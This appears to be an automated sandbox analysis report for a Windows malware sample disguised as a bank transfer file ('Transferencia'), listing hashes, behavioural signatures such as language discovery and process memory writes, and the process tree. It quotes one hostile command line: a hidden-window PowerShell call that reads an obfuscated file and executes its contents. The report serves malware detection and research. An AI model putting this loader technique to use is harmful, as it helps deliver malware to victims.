Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 16:00
Static task
static1
Behavioral task
behavioral1
Sample
Transferencia 4317370002017852.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Transferencia 4317370002017852.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
Transferencia 4317370002017852.exe
-
Size
553KB
-
MD5
99e39c4f2f22df9a099e7fc6b374dcf4
-
SHA1
be78ffa0116195b071a9b627f8758b05c9e1233c
-
SHA256
65923434a772e80f32b56fbddf49f5ceef3f536611c7a3f7c610c231ba59d27f
-
SHA512
85c8c70e40855ce42358c13cfead8700c0f1b269661b7164081b2ccf6c2f47a09bda94bcb9e71efab49616b4c2607b62d7d019ee7c59ef8fe707525234ceac43
-
SSDEEP
12288:v93jlfVEb2p27gyIV9h5cKVLK1Svks2Fjz4hzaVtIXPLcD:v93jl9XAgyID3xL2SvJajzizTcD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 300 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 1528 Transferencia 4317370002017852.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\udlndingelovene\troldunge.ini Transferencia 4317370002017852.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Transferencia 4317370002017852.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 300 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1528 wrote to memory of 300 1528 Transferencia 4317370002017852.exe 30 PID 1528 wrote to memory of 300 1528 Transferencia 4317370002017852.exe 30 PID 1528 wrote to memory of 300 1528 Transferencia 4317370002017852.exe 30 PID 1528 wrote to memory of 300 1528 Transferencia 4317370002017852.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\Transferencia 4317370002017852.exe"C:\Users\Admin\AppData\Local\Temp\Transferencia 4317370002017852.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Eksplosionsrisiko=gc -raw 'C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Atamasco\Realkommentarerne.Abs';$Zootechnician=$Eksplosionsrisiko.SubString(23684,3);.$Zootechnician($Eksplosionsrisiko) "2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
794B
MD5db00da16fee35dc382870f38bee25984
SHA1c71f6b3a915877481cf6a3f60dedaa9e6877ed9f
SHA256bf08285d3d0fefe1db2be31eef97ca161398630583bd722e0127530551c87c61
SHA51269939b2be62e18c760cabd26b37db6f079533a80b7c17cc6a4befecfb4bdb6cbd35119815234f5d4d2ff5e559e9342553bc8da1758a9840ed3d90561633f6c0b
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2